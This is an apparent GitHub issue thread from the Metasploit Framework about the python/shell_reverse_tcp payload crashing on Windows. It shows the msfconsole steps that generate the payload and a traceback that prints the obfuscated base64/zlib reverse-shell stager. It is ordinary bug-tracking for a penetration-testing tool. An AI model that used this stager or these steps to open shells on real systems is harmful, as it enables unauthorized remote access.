### ISSUE TITLE
python/shell_reverse_tcp doesn't work on windows - 'bytes args is not allowed on Windows'

### ISSUE THREAD

**Issue by adfoster-r7** [rapid7/metasploit-framework#18029]
## Steps to reproduce

Metasploit:

```
msf6 > use 0
msf6 payload(python/shell_reverse_tcp) > options

Module options (payload/python/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(python/shell_reverse_tcp) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf6 payload(python/shell_reverse_tcp) > generate -f raw -o shell.py
[*] Writing 392 bytes to shell.py...
msf6 payload(python/shell_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(python/shell_reverse_tcp) >
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] 127.0.0.1 - Command shell session 1 closed.
Interrupt: use the 'exit' command to quit
msf6 payload(python/shell_reverse_tcp) >
```

The target's output:

```
c:\metasploit-framework>python shell.py
Traceback (most recent call last):
  File "c:\metasploit-framework\shell.py", line 1, in <module>
    exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNpNjsFqwzAMhs/2U/hWmwWTlEJh4EMZGZSxray5l9RWqWlmG8nZXn/2mkOl06f/Q5L/ThGzoGhvkMVIgrhfRvM5YbRAVMfIKRrSd0+S3r2e9h/90JA+fr68nY7DV797V0XSNoYANku56tZb3ZbuVs2mlFL89+onEAPO8MyZM8VGsD+ya9cbxZm/iAmCdMqYtuTsjDDeOEsG9SGmmjR0hWkydUFD2flQo/2hrxDn/ECAuFBZHE3Sd6PcG51UT/9cnIU5K68QBCej4n87p1aM')[0])))
  File "<string>", line 9, in <module>
  File "C:\Python311\Lib\subprocess.py", line 1024, in __init__
    self._execute_child(args, executable, preexec_fn, close_fds,
  File "C:\Python311\Lib\subprocess.py", line 1425, in _execute_child
    raise TypeError('bytes args is not allowed on Windows')
TypeError: bytes args is not allowed on Windows
```

### Version

```
Framework: 6.3.18-dev-34ae293c2b
Console  : 6.3.18-dev-34ae293c2b
```

**Comment by Young-Lord** [comment]
same for `cmd/windows/python/shell_reverse_tcp`. Python version `3.11.2`.

**Comment by manishkumarr1017** [comment]
I want to work on this issue.
